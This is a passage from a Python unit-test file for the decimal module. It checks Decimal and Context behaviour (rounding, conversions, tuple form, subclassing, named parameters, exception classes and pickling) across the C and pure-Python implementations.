self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
pass
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
